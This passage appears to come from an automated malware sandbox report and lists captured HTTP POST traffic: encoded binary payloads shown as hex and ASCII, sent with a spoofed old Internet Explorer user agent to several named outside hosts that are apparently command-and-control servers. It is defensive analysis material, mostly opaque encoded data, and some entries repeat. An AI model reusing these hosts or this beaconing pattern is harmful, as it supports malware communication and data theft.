6b 42 50 4e 72 41 42 36 56 58 61 2b 50 4a 4b 4e 4b 64 6d 63 68 67 4a 53 68 68 44 63 45 79 63 69 67 50 77 5a 4f 37 56 47 64 62 69 5a 42 50 65 69 76 51 43 6f 37 64 5a 37 77 49 59 6a 45 79 58 65 77 31 73 6c 64 36 6f 64 52 30 Data Ascii: 1Q6bVstovQckWLQZIiehVDRJa54RiwVgL3/DoaFasQowk2Bbq1erggEu7MSfsG/eJXemY250yGiXR4sfTrzdol3hHKpSHx0aeEy0OZiOhLrPwJUFIKb41HBQdOOjzsfOJyDx9MYWNWdjkIPhwePB2bMRSHlOP/tA6TJq7KubF829V0qzG7YURLuFnQlTkzrG3PAXn+MARv/dgjWRf0LZV0bbQ3pBbvgzw6oWf79eRl9+uNosZdA8QSZMYE2ftJOtUCGblBxY+AzHMJBg8ow23mNxIrg5FkYFzCAhJnvhdE8tflsEuIxnaYrY3YrtqxReqhjGJG/ySVxinwmd2VLvH4ZTPrLVj1oPnclXv4juGAuH+5yTO21s+txdT2N9WyAjnQ2D2IMm2wnhd9aNTX8Eb5FNCY2iVErGkOkfytZzQgVRunWBtiWl3LSf5y1Urzg+eq3ZEq6qA0052pri5Qj3+6eMAXHMu9z/XIS0YU/52uzeUgci7ONQLgkBPNrAB6VXa+PJKNKdmchgJShhDcEycigPwZO7VGdbiZBPeivQCo7dZ7wIYjEyXew1sld6odR0
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 48 64 64 76 6a 57 41 68 32 41 66 45 41 33 72 7a 73 2b 55 55 41 70 4f 7a 2f 41 33 49 53 30 62 34 6c 48 37 68 53 43 78 4a 4f 2f 42 56 42 55 70 53 64 4f 6e 6d 67 42 70 33 77 76 4c 55 70 4b 59 58 35 78 69 62 2b 58 75 44 51 62 52 73 6f 56 68 38 55 53 32 59 66 59 31 37 38 72 45 76 42 37 5a 4b 45 71 75 52 42 2b 61 62 57 50 35 39 35 50 52 49 48 46 39 55 79 75 32 77 5a 76 51 69 75 33 61 4b 79 7a 44 61 74 4a 41 4d 74 31 4b 75 37 59 78 45 4e 53 42 79 4c 37 58 55 76 63 65 73 47 46 70 6c 75 78 7a 6e 6e 49 79 6f 45 54 32 47 6f 46 77 45 36 72 6c 34 43 76 38 71 4e 33 36 50 68 4b 36 72 2b 47 66 6d 53 2b 33 55 34 73 7a 50 45 54 2f 48 56 56 57 76 32 70 6d 54 7a 77 2b 56 64 45 66 6d 70 50 59 56 74 41 63 71 57 4e 34 32 62 71 6d 6e 75 61 6f 69 57 47 47 70 68 47 36 52 36 75 33 4d 4f 48 77 39 66 2b 2b 78 56 37 53 47 53 58 73 62 48 70 74 72 48 49 6c 68 52 68 63 68 33 32 34 55 4d 55 50 52 73 36 4a 36 56 6b 6d 41 7a 4e 74 6a 30 58 75 65 61 76 70 45 38 45 75 58 69 30 48 4c 5a 7a 6e 34 74 7a 6f 32 6b 6a 46 78 45 38 58 42 75 76 47 32 30 58 31 71 51 70 32 6c 58 66 32 66 69 49 38 4c 6c 35 58 7a 73 53 70 79 54 4d 36 45 68 6c 57 77 6b 33 65 36 38 43 4e 56 57 59 35 65 67 36 4f 2b 75 75 41 49 35 46 50 34 43 36 74 45 48 65 32 48 63 62 48 7a 7a 37 65 48 45 6c 6d 59 61 39 51 36 4f 31 65 64 50 42 4e 64 44 74 58 42 35 41 56 4c 6d 6b 44 76 42 67 32 63 44 34 65 6b 54 6a 44 37 31 57 46 59 53 62 35 42 32 6a 58 44 63 69 31 6c 5a 6d 78 5a 4f 78 55 6a 76 79 70 31 77 73 6c 63 39 74 32 35 38 31 63 66 32 30 4e 6c 70 63 66 56 5a 4b 37 55 37 36 71 56 4a 30 2f 6b 6b 45 45 34 48 72 49 75 6d 53 65 39 75 70 37 61 4b 35 4d 75 76 75 53 6b 78 59 34 59 75 41 75 30 58 79 79 55 64 51 73 77 66 33 59 4a 41 77 3d 3d Data Ascii: HddvjWAh2AfEA3rzs+UUApOz/A3IS0b4lH7hSCxJO/BVBUpSdOnmgBp3wvLUpKYX5xib+XuDQbRsoVh8US2YfY178rEvB7ZKEquRB+abWP595PRIHF9Uyu2wZvQiu3aKyzDatJAMt1Ku7YxENSByL7XUvcesGFpluxznnIyoET2GoFwE6rl4Cv8qN36PhK6r+GfmS+3U4szPET/HVVWv2pmTzw+VdEfmpPYVtAcqWN42bqmnuaoiWGGphG6R6u3MOHw9f++xV7SGSXsbHptrHIlhRhch324UMUPRs6J6VkmAzNtj0XueavpE8EuXi0HLZzn4tzo2kjFxE8XBuvG20X1qQp2lXf2fiI8Ll5XzsSpyTM6EhlWwk3e68CNVWY5eg6O+uuAI5FP4C6tEHe2HcbHzz7eHElmYa9Q6O1edPBNdDtXB5AVLmkDvBg2cD4ekTjD71WFYSb5B2jXDci1lZmxZOxUjvyp1wslc9t2581cf20NlpcfVZK7U76qVJ0/kkEE4HrIumSe9up7aK5MuvuSkxY4YuAu0XyyUdQswf3YJAw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheData Raw: 62 75 51 30 76 43 53 39 6e 51 61 50 43 67 54 4e 76 2b 5a 52 35 50 66 33 53 76 48 63 48 45 4e 67 6d 46 51 41 61 75 32 46 50 77 77 76 71 43 76 56 6a 44 54 33 39 63 48 77 5a 59 65 74 59 48 6d 49 69 54 57 39 2f 79 66 72 56 2f 33 69 42 79 4b 4a 4d 4e 58 30 75 53 4f 2f 42 79 78 33 59 61 56 77 6b 77 32 54 2f 52 35 4e 35 35 39 30 42 55 57 6e 32 6c 42 39 75 52 31 6b 35 62 63 54 38 6a 46 51 4d 36 33 38 35 4f 32 48 45 6f 30 4f 64 36 78 33 2f 54 34 44 52 5a 6f 39 31 67 68 7a 78 50 64 6a 7a 58 2b 5a 69 4e 75 6a 70 43 2f 6d 51 75 30 55 68 66 66 72 4f 2b 59 75 46 46 4b 79 74 76 61 4c 47 67 45 49 63 54 56 66 53 69 50 41 43 35 62 4e 31 5a 2f 4d 75 32 4d 61 58 54 69 74 61 4b 43 7a 39 44 48 51 74 65 33 51 62 35 36 57 31 6a 6f 5a 67 74 32 36 65 67 69 4c 56 6d 68 46 33 42 43 77 6e 53 49 36 52 53 31 6c 6c 7a 76 50 4a 49 7a 63 49 72 35 68 77 52 30 62 54 42 35 71 79 53 64 4f 45 38 39 52 6e 38 6b 2f 48 46 36 75 4e 75 78 42 4f 50 53 67 4f 48 31 61 7a 58 42 72 32 61 79 31 75 45 71 43 6f 66 56 78 6c 57 2b 56 44 64 56 34 53 53 69 59 30 79 31 5a 65 65 72 34 71 33 50 77 44 54 4f 53 75 46 44 73 70 4e 75 50 70 74 48 66 4f 38 54 69 62 74 50 6e 76 62 72 70 33 42 50 57 4b 6c 39 79 68 4b 59 2f 69 6f 53 72 42 7a 50 65 6f 50 67 53 35 6f 31 6a 6e 50 52 6f 31 78 51 75 47 6d 4b 33 4f 73 68 32 64 74 54 50 4e 49 69 4f 43 57 31 37 74 78 32 67 55 67 4e 56 51 49 59 76 4f 48 33 45 35 57 33 4d 77 68 77 75 6b 75 4d 33 39 6a 43 58 36 45 46 71 4f 57 48 33 2f 42 68 72 44 6d 6e 57 47 68 56 4f 63 6e 6d 77 4e 53 39 57 6c 2b 42 76 6d 70 62 65 6e 31 2f 76 7a 78 75 73 34 62 4a 48 49 70 67 78 67 68 64 4c 52 41 36 68 4c 5a 45 46 62 65 55 51 48 53 72 32 44 6f 74 6e 44 65 51 35 49 54 39 73 Data Ascii: buQ0vCS9nQaPCgTNv+ZR5Pf3SvHcHENgmFQAau2FPwwvqCvVjDT39cHwZYetYHmIiTW9/yfrV/3iByKJMNX0uSO/Byx3YaVwkw2T/R5N5590BUWn2lB9uR1k5bcT8jFQM6385O2HEo0Od6x3/T4DRZo91ghzxPdjzX+ZiNujpC/mQu0UhffrO+YuFFKytvaLGgEIcTVfSiPAC5bN1Z/Mu2MaXTitaKCz9DHQte3Qb56W1joZgt26egiLVmhF3BCwnSI6RS1llzvPJIzcIr5hwR0bTB5qySdOE89Rn8k/HF6uNuxBOPSgOH1azXBr2ay1uEqCofVxlW+VDdV4SSiY0y1Zeer4q3PwDTOSuFDspNuPptHfO8TibtPnvbrp3BPWKl9yhKY/ioSrBzPeoPgS5o1jnPRo1xQuGmK3Osh2dtTPNIiOCW17tx2gUgNVQIYvOH3E5W3MwhwukuM39jCX6EFqOWH3/BhrDmnWGhVOcnmwNS9Wl+Bvmpben1/vzxus4bJHIpgxghdLRA6hLZEFbeUQHSr2DotnDeQ5IT9s
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 48 64 64 76 6a 57 41 68 32 41 66 45 41 33 72 7a 73 2b 55 55 41 70 4f 7a 2f 41 33 49 53 30 62 34 6c 48 37 68 53 43 78 4a 4f 2f 42 56 42 55 70 53 64 4f 6e 6d 67 42 70 33 77 76 4c 55 70 4b 59 58 35 78 69 62 2b 58 75 44 51 62 52 73 6f 56 68 38 55 53 32 59 66 59 31 37 38 72 45 76 42 37 5a 4b 45 71 75 52 42 2b 61 62 57 50 35 39 35 50 52 49 48 46 39 55 79 75 32 77 5a 76 51 69 75 33 61 4b 79 7a 44 61 74 4a 41 4d 74 31 4b 75 37 59 78 45 4e 53 42 79 4c 37 58 55 76 63 65 73 47 46 70 6c 75 78 7a 6e 6e 49 79 6f 45 54 32 47 6f 46 77 45 36 72 6c 34 43 76 38 71 4e 33 36 50 68 4b 36 72 2b 47 66 6d 53 2b 33 55 34 73 7a 50 45 54 2f 48 56 56 57 76 32 70 6d 54 7a 77 2b 56 64 45 66 6d 70 50 59 56 74 41 63 71 57 4e 34 32 62 71 6d 6e 75 61 6f 69 57 47 47 70 68 47 36 52 36 75 33 4d 4f 48 77 39 66 2b 2b 78 56 37 53 47 53 58 73 62 48 70 74 72 48 49 6c 68 52 68 63 68 33 32 34 55 4d 55 50 52 73 36 4a 36 56 6b 6d 41 7a 4e 74 6a 30 58 75 65 61 76 70 45 38 45 75 58 69 30 48 4c 5a 7a 6e 34 74 7a 6f 32 6b 6a 46 78 45 38 58 42 75 76 47 32 30 58 31 71 51 70 32 6c 58 66 32 66 69 49 38 4c 6c 35 58 7a 73 53 70 79 54 4d 36 45 68 6c 57 77 6b 33 65 36 38 43 4e 56 57 59 35 65 67 36 4f 2b 75 75 41 49 35 46 50 34 43 36 74 45 48 65 32 48 63 62 48 7a 7a 37 65 48 45 6c 6d 59 61 39 51 36 4f 31 65 64 50 42 4e 64 44 74 58 42 35 41 56 4c 6d 6b 44 76 42 67 32 63 44 34 65 6b 54 6a 44 37 31 57 46 59 53 62 35 42 32 6a 58 44 63 69 31 6c 5a 6d 78 5a 4f 78 55 6a 76 79 70 31 77 73 6c 63 39 74 32 35 38 31 63 66 32 30 4e 6c 70 63 66 56 5a 4b 37 55 37 36 71 56 4a 30 2f 6b 6b 45 45 34 48 72 49 75 6d 53 65 39 75 70 37 61 4b 35 4d 75 76 75 53 6b 78 59 34 59 75 41 75 30 58 79 79 55 64 51 73 77 66 33 59 4a 41 77 3d 3d Data Ascii: HddvjWAh2AfEA3rzs+UUApOz/A3IS0b4lH7hSCxJO/BVBUpSdOnmgBp3wvLUpKYX5xib+XuDQbRsoVh8US2YfY178rEvB7ZKEquRB+abWP595PRIHF9Uyu2wZvQiu3aKyzDatJAMt1Ku7YxENSByL7XUvcesGFpluxznnIyoET2GoFwE6rl4Cv8qN36PhK6r+GfmS+3U4szPET/HVVWv2pmTzw+VdEfmpPYVtAcqWN42bqmnuaoiWGGphG6R6u3MOHw9f++xV7SGSXsbHptrHIlhRhch324UMUPRs6J6VkmAzNtj0XueavpE8EuXi0HLZzn4tzo2kjFxE8XBuvG20X1qQp2lXf2fiI8Ll5XzsSpyTM6EhlWwk3e68CNVWY5eg6O+uuAI5FP4C6tEHe2HcbHzz7eHElmYa9Q6O1edPBNdDtXB5AVLmkDvBg2cD4ekTjD71WFYSb5B2jXDci1lZmxZOxUjvyp1wslc9t2581cf20NlpcfVZK7U76qVJ0/kkEE4HrIumSe9up7aK5MuvuSkxY4YuAu0XyyUdQswf3YJAw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 79 66 46 5a 50 67 5a 69 49 41 68 31 42 76 4f 72 49 56 47 34 48 79 6b 46 4f 30 4e 6d 4b 44 44 65 6d 75 61 61 43 4a 77 30 65 65 33 75 77 2f 54 79 78 78 41 54 4b 56 49 31 4e 72 30 68 37 76 7a 4f 43 42 37 4a 66 36 52 6f 76 74 6e 7a 32 4e 44 4f 61 68 66 56 52 59 72 38 65 6a 51 79 4e 65 6b 31 48 70 50 4d 65 44 54 45 59 41 6c 7a 4b 48 30 62 52 65 67 30 39 49 4e 79 49 32 54 44 50 38 58 31 49 6b 72 71 6a 5a 69 6b 6a 45 6d 30 34 71 6d 54 65 37 65 43 39 52 33 51 52 39 6b 42 47 64 79 6b 58 64 48 6d 72 4f 37 36 32 64 66 70 59 53 50 6e 48 6b 49 71 77 76 58 46 66 70 66 41 68 32 63 42 6c 59 6b 54 62 64 55 52 69 30 57 59 59 6e 62 33 36 66 5a 6b 42 33 45 75 4c 4f 41 69 69 46 4a 45 75 34 39 7a 58 6f 42 48 2f 55 36 41 41 6a 30 72 62 61 68 71 32 79 45 4b 71 44 47 70 70 62 33 64 4a 6d 55 54 33 47 32 4d 2b 51 67 73 6c 31 33 6a 48 4b 57 6f 6b 56 52 54 69 71 39 62 6f 6b 66 4f 59 54 58 57 74 54 65 2f 42 59 5a 64 44 6a 57 62 78 6a 38 68 50 43 36 4f 34 46 54 72 66 2f 4e 66 50 63 32 62 61 59 36 35 79 6e 55 59 66 44 6c 71 63 36 54 6c 65 6b 37 2b 50 54 5a 58 71 68 70 61 37 5a 49 68 70 74 42 39 6f 33 66 56 32 6b 72 36 39 4f 31 4e 71 75 38 53 2f 46 4e 43 63 48 31 77 39 36 6a 30 69 6b 43 72 74 37 38 45 6a 45 63 52 33 41 45 46 49 6e 69 39 72 6a 72 79 79 31 66 7a 36 37 78 37 61 4a 64 66 73 32 52 7a 30 44 56 32 48 46 6b 47 32 35 55 30 64 35 43 52 63 30 65 53 71 78 6a 72 34 4d 76 61 77 78 46 65 31 4f 49 2f 34 5a 79 4d 6b 63 51 51 7a 33 52 4e 4e 34 4c 42 47 7a 75 46 59 77 42 36 5a 43 65 78 33 6d 64 50 35 4f 62 73 64 70 2f 34 62 45 6b 4d 55 5a 34 45 74 6b 51 75 41 32 2b 34 6f 63 51 43 35 71 6e 72 2b 62 39 6e 2b 71 31 6a 78 72 49 78 4a 6c 6e 5a 34 73 64 4f 61 73 2f 46 4c 42 74 6b 47 37 4f 4d 6c 52 5a 39 38 64 66 45 54 52 47 32 54 6c 35 62 6d 64 43 51 72 72 75 78 42 65 38 4f Data Ascii: yfFZPgZiIAh1BvOrIVG4HykFO0NmKDDemuaaCJw0ee3uw/TyxxATKVI1Nr0h7vzOCB7Jf6Rovtnz2NDOahfVRYr8ejQyNek1HpPMeDTEYAlzKH0bReg09INyI2TDP8X1IkrqjZikjEm04qmTe7eC9R3QR9kBGdykXdHmrO762dfpYSPnHkIqwvXFfpfAh2cBlYkTbdURi0WYYnb36fZkB3EuLOAiiFJEu49zXoBH/U6AAj0rbahq2yEKqDGppb3dJmUT3G2M+Qgsl13jHKWokVRTiq9bokfOYTXWtTe/BYZdDjWbxj8hPC6O4FTrf/NfPc2baY65ynUYfDlqc6Tlek7+PTZXqhpa7ZIhptB9o3fV2kr69O1Nqu8S/FNCcH1w96j0ikCrt78EjEcR3AEFIni9rjryy1fz67x7aJdfs2Rz0DV2HFkG25U0d5CRc0eSqxjr4MvawxFe1OI/4ZyMkcQQz3RNN4LBGzuFYwB6ZCex3mdP5Obsdp/4bEkMUZ4EtkQuA2+4ocQC5qnr+b9n+q1jxrIxJlnZ4sdOas/FLBtkG7OMlRZ98dfETRG2Tl5bmdCQrruxBe8O
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4b 71 67 59 38 65 54 79 69 51 68 31 2f 6d 34 62 66 79 42 37 57 72 64 7a 69 78 75 63 56 5a 68 4d 57 41 59 4c 7a 52 76 47 55 43 53 64 6d 4d 70 34 64 32 63 70 61 54 32 6b 38 2b 69 6d 79 55 51 59 43 44 41 77 75 54 5a 70 69 42 64 45 2b 47 42 30 72 65 45 33 76 31 59 4b 42 6e 58 53 73 63 45 38 42 75 33 2f 4e 6a 4f 77 6c 54 54 4d 75 55 52 62 67 73 5a 70 72 4a 32 72 6b 75 55 46 65 4a 72 49 67 58 57 4e 73 74 52 67 61 69 4e 56 7a 42 70 4a 6f 77 42 6e 74 2f 4c 4b 35 2b 70 64 77 6a 51 2b 6f 53 50 70 79 6b 46 41 33 54 4f 6d 69 4f 67 62 4f 39 2f 2f 78 39 35 4d 30 70 74 79 53 6c 42 2b 46 41 36 68 5a 57 44 41 6f 52 44 50 52 37 37 50 65 6b 55 49 6e 59 36 56 4c 63 63 30 67 6d 4f 39 51 45 32 74 42 55 72 74 67 6d 30 4f 4a 59 76 34 5a 55 76 47 37 51 52 67 33 5a 57 35 68 55 44 4d 34 70 37 31 2b 59 30 64 79 74 77 7a 31 59 68 74 6d 34 38 5a 6c 4b 38 6f 52 4d 4e 78 51 36 52 78 38 62 66 79 39 36 37 46 31 45 44 37 72 41 59 69 4a 32 31 59 64 52 67 41 7a 74 2f 55 62 69 61 75 42 6b 4b 58 72 37 55 4b 55 6f 6a 62 55 6d 63 62 31 69 68 66 6e 44 46 4f 77 72 4e 6d 38 76 44 4d 77 4b 45 34 4c 44 75 4c 66 48 6c 71 70 51 43 6d 4c 6e 57 6a 42 38 70 79 7a 49 70 4e 73 58 50 67 4b 43 5a 55 58 76 4b 75 38 72 67 78 4c 51 75 56 69 75 6e 59 59 54 74 56 77 46 63 51 37 56 6f 5a 78 78 72 54 42 6b 75 2f 4a 2b 79 66 7a 55 56 6f 4e 2b 43 75 6d 58 62 48 49 45 59 33 69 4a 33 71 4d 4e 69 4d 49 79 45 42 2b 74 61 2b 50 34 7a 4d 68 45 49 43 77 48 50 63 74 43 44 69 4d 4e 53 4d 53 7a 6e 4e 4b 6d 54 46 52 5a 54 6f 54 45 65 4e 79 2f 38 6b 45 74 6c 4d 72 38 7a 6a 44 4c 73 6a 55 36 50 6a 45 62 34 4c 73 78 49 35 57 54 43 51 44 59 2b 45 46 70 44 4a 4b 6f 71 49 6b 57 6f 46 49 64 64 77 55 4f 42 33 Data Ascii: KqgY8eTyiQh1/m4bfyB7WrdzixucVZhMWAYLzRvGUCSdmMp4d2cpaT2k8+imyUQYCDAwuTZpiBdE+GB0reE3v1YKBnXSscE8Bu3/NjOwlTTMuURbgsZprJ2rkuUFeJrIgXWNstRgaiNVzBpJowBnt/LK5+pdwjQ+oSPpykFA3TOmiOgbO9//x95M0ptySlB+FA6hZWDAoRDPR77PekUInY6VLcc0gmO9QE2tBUrtgm0OJYv4ZUvG7QRg3ZW5hUDM4p71+Y0dytwz1Yhtm48ZlK8oRMNxQ6Rx8bfy967F1ED7rAYiJ21YdRgAzt/UbiauBkKXr7UKUojbUmcb1ihfnDFOwrNm8vDMwKE4LDuLfHlqpQCmLnWjB8pyzIpNsXPgKCZUXvKu8rgxLQuViunYYTtVwFcQ7VoZxxrTBku/J+yfzUVoN+CumXbHIEY3iJ3qMNiMIyEB+ta+P4zMhEICwHPctCDiMNSMSznNKmTFRZToTEeNy/8kEtlMr8zjDLsjU6PjEb4LsxI5WTCQDY+EFpDJKoqIkWoFIddwUOB3
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4b 71 67 59 38 65 54 79 69 51 68 31 2f 6d 34 62 66 79 42 37 57 72 64 7a 69 78 75 63 56 5a 68 4d 57 41 59 4c 7a 52 76 47 55 43 53 64 6d 4d 70 34 64 32 63 70 61 54 32 6b 38 2b 69 6d 79 55 51 59 43 44 41 77 75 54 5a 70 69 42 64 45 2b 47 42 30 72 65 45 33 76 31 59 4b 42 6e 58 53 73 63 45 38 42 75 33 2f 4e 6a 4f 77 6c 54 54 4d 75 55 52 62 67 73 5a 70 72 4a 32 72 6b 75 55 46 65 4a 72 49 67 58 57 4e 73 74 52 67 61 69 4e 56 7a 42 70 4a 6f 77 42 6e 74 2f 4c 4b 35 2b 70 64 77 6a 51 2b 6f 53 50 70 79 6b 46 41 33 54 4f 6d 69 4f 67 62 4f 39 2f 2f 78 39 35 4d 30 70 74 79 53 6c 42 2b 46 41 36 68 5a 57 44 41 6f 52 44 50 52 37 37 50 65 6b 55 49 6e 59 36 56 4c 63 63 30 67 6d 4f 39 51 45 32 74 42 55 72 74 67 6d 30 4f 4a 59 76 34 5a 55 76 47 37 51 52 67 33 5a 57 35 68 55 44 4d 34 70 37 31 2b 59 30 64 79 74 77 7a 31 59 68 74 6d 34 38 5a 6c 4b 38 6f 52 4d 4e 78 51 36 52 78 38 62 66 79 39 36 37 46 31 45 44 37 72 41 59 69 4a 32 31 59 64 52 67 41 7a 74 2f 55 62 69 61 75 42 6b 4b 58 72 37 55 4b 55 6f 6a 62 55 6d 63 62 31 69 68 66 6e 44 46 4f 77 72 4e 6d 38 76 44 4d 77 4b 45 34 4c 44 75 4c 66 48 6c 71 70 51 43 6d 4c 6e 57 6a 42 38 70 79 7a 49 70 4e 73 58 50 67 4b 43 5a 55 58 76 4b 75 38 72 67 78 4c 51 75 56 69 75 6e 59 59 54 74 56 77 46 63 51 37 56 6f 5a 78 78 72 54 42 6b 75 2f 4a 2b 79 66 7a 55 56 6f 4e 2b 43 75 6d 58 62 48 49 45 59 33 69 4a 33 71 4d 4e 69 4d 49 79 45 42 2b 74 61 2b 50 34 7a 4d 68 45 49 43 77 48 50 63 74 43 44 69 4d 4e 53 4d 53 7a 6e 4e 4b 6d 54 46 52 5a 54 6f 54 45 65 4e 79 2f 38 6b 45 74 6c 4d 72 38 7a 6a 44 4c 73 6a 55 36 50 6a 45 62 34 4c 73 78 49 35 57 54 43 51 44 59 2b 45 46 70 44 4a 4b 6f 71 49 6b 57 6f 46 49 64 64 77 55 4f 42 33 Data Ascii: KqgY8eTyiQh1/m4bfyB7WrdzixucVZhMWAYLzRvGUCSdmMp4d2cpaT2k8+imyUQYCDAwuTZpiBdE+GB0reE3v1YKBnXSscE8Bu3/NjOwlTTMuURbgsZprJ2rkuUFeJrIgXWNstRgaiNVzBpJowBnt/LK5+pdwjQ+oSPpykFA3TOmiOgbO9//x95M0ptySlB+FA6hZWDAoRDPR77PekUInY6VLcc0gmO9QE2tBUrtgm0OJYv4ZUvG7QRg3ZW5hUDM4p71+Y0dytwz1Yhtm48ZlK8oRMNxQ6Rx8bfy967F1ED7rAYiJ21YdRgAzt/UbiauBkKXr7UKUojbUmcb1ihfnDFOwrNm8vDMwKE4LDuLfHlqpQCmLnWjB8pyzIpNsXPgKCZUXvKu8rgxLQuViunYYTtVwFcQ7VoZxxrTBku/J+yfzUVoN+CumXbHIEY3iJ3qMNiMIyEB+ta+P4zMhEICwHPctCDiMNSMSznNKmTFRZToTEeNy/8kEtlMr8zjDLsjU6PjEb4LsxI5WTCQDY+EFpDJKoqIkWoFIddwUOB3
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 43 66 64 57 4a 42 62 74 6b 77 69 33 36 76 77 34 38 63 47 4f 77 37 6d 57 2b 2f 43 32 75 47 34 38 71 74 49 58 31 78 68 70 57 4d 50 4d 66 30 71 30 65 65 39 4d 45 2f 50 6c 52 6e 72 55 47 6e 32 38 70 68 33 74 75 42 74 30 39 78 49 32 53 58 58 61 2b 35 30 76 50 59 4a 2f 6c 32 67 77 69 73 34 52 6e 55 55 38 64 73 4a 64 6f 48 77 69 69 64 43 47 61 37 6b 51 76 6c 62 56 51 4b 6d 49 47 4e 4c 6b 4d 52 70 71 33 34 6e 75 5a 4b 4e 65 4e 6f 50 70 77 41 33 48 59 62 32 4d 50 49 75 65 54 4c 41 77 6c 43 78 43 4b 6b 44 39 37 67 78 56 63 47 53 59 56 43 54 70 62 43 76 56 67 33 37 69 54 31 50 74 58 73 54 73 71 59 70 7a 59 39 70 78 4f 6f 58 49 62 76 4d 57 34 47 75 6c 4b 63 66 6a 7a 77 53 67 6b 57 2b 56 64 77 58 77 69 52 69 42 4f 38 67 35 53 77 55 76 53 36 6f 6f 53 48 68 76 52 64 69 58 4b 66 42 38 6b 62 71 62 33 49 75 54 62 79 67 35 31 6e 57 77 61 34 50 63 6e 48 37 31 6e 6f 66 4f 62 2f 51 54 30 66 4b 79 45 35 57 33 68 48 65 68 51 4d 41 6a 70 58 35 53 61 6c 76 46 52 6d 32 71 62 69 57 50 53 43 77 53 43 33 48 4e 38 73 33 57 53 56 63 79 48 34 37 77 41 67 77 33 64 6f 4c 6e 5a 77 68 4f 47 4d 72 63 76 6a 53 4c 53 71 7a 48 70 48 4b 44 36 49 52 65 4e 68 43 78 57 53 5a 46 69 43 37 42 54 6f 62 74 4a 46 55 75 36 47 47 33 7a 67 31 57 61 36 77 72 6b 36 52 41 4c 46 65 61 77 4f 49 53 46 75 30 75 37 7a 73 6f 53 57 6a 71 55 33 57 66 70 71 44 74 53 59 72 70 53 6d 37 78 52 53 37 79 51 44 34 44 63 52 71 43 42 4b 4e 68 6c 79 78 30 59 6a 45 77 2f 30 44 63 5a 5a 36 7a 78 71 42 4c 46 61 78 73 63 52 73 32 65 57 46 6f 71 31 62 64 36 42 4f 59 48 2f 64 42 63 7a 69 33 55 63 55 6d 38 61 6d 73 76 4e 54 73 61 37 77 74 4d 4e 7a 58 50 34 2f 6f 5a 41 69 46 2f 4a 48 4c 44 43 52 61 57 44 6a 75 73 43 6b 64 77 4c 70 72 4d 41 4b 33 51 58 33 6b 4b 61 6a 78 6b 61 67 42 33 51 3d 3d Data Ascii: CfdWJBbtkwi36vw48cGOw7mW+/C2uG48qtIX1xhpWMPMf0q0ee9ME/PlRnrUGn28ph3tuBt09xI2SXXa+50vPYJ/l2gwis4RnUU8dsJdoHwiidCGa7kQvlbVQKmIGNLkMRpq34nuZKNeNoPpwA3HYb2MPIueTLAwlCxCKkD97gxVcGSYVCTpbCvVg37iT1PtXsTsqYpzY9pxOoXIbvMW4GulKcfjzwSgkW+VdwXwiRiBO8g5SwUvS6ooSHhvRdiXKfB8kbqb3IuTbyg51nWwa4PcnH71nofOb/QT0fKyE5W3hHehQMAjpX5SalvFRm2qbiWPSCwSC3HN8s3WSVcyH47wAgw3doLnZwhOGMrcvjSLSqzHpHKD6IReNhCxWSZFiC7BTobtJFUu6GG3zg1Wa6wrk6RALFeawOISFu0u7zsoSWjqU3WfpqDtSYrpSm7xRS7yQD4DcRqCBKNhlyx0YjEw/0DcZZ6zxqBLFaxscRs2eWFoq1bd6BOYH/dBczi3UcUm8amsvNTsa7wtMNzXP4/oZAiF/JHLDCRaWDjusCkdwLprMAK3QX3kKajxkagB3Q==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 6d 6f 77 38 48 78 44 6c 35 67 6a 4a 32 58 4e 68 6f 2f 58 38 44 63 4d 69 6a 36 30 34 67 62 4a 47 52 43 55 43 34 31 48 49 53 63 4d 50 52 63 6e 7a 4a 67 77 4c 6b 72 52 50 30 41 64 77 4b 35 49 6e 66 72 68 4f 6f 54 4b 48 45 5a 75 47 67 30 46 4c 49 6f 33 6f 4e 37 76 55 31 39 75 67 2b 79 61 74 67 51 72 49 36 39 6b 61 51 6c 4b 59 41 75 6a 34 70 51 44 74 75 34 31 36 79 67 6d 53 35 4a 58 74 43 67 39 7a 51 4b 71 4e 49 6e 66 6e 4d 6d 4c 73 65 78 65 33 56 6c 6c 76 48 68 59 6d 58 4e 56 69 58 72 6b 37 62 54 63 72 5a 47 77 73 38 63 50 6d 30 65 63 55 38 33 76 77 63 46 52 45 45 42 77 75 71 55 66 68 37 4d 35 54 68 51 79 64 78 44 43 38 56 61 4b 42 73 71 73 7a 54 71 57 76 78 32 46 49 4e 74 42 32 73 2f 76 33 33 2b 46 6a 45 4d 73 2f 45 61 54 62 66 37 65 7a 76 49 38 4e 64 72 55 6d 47 66 43 32 66 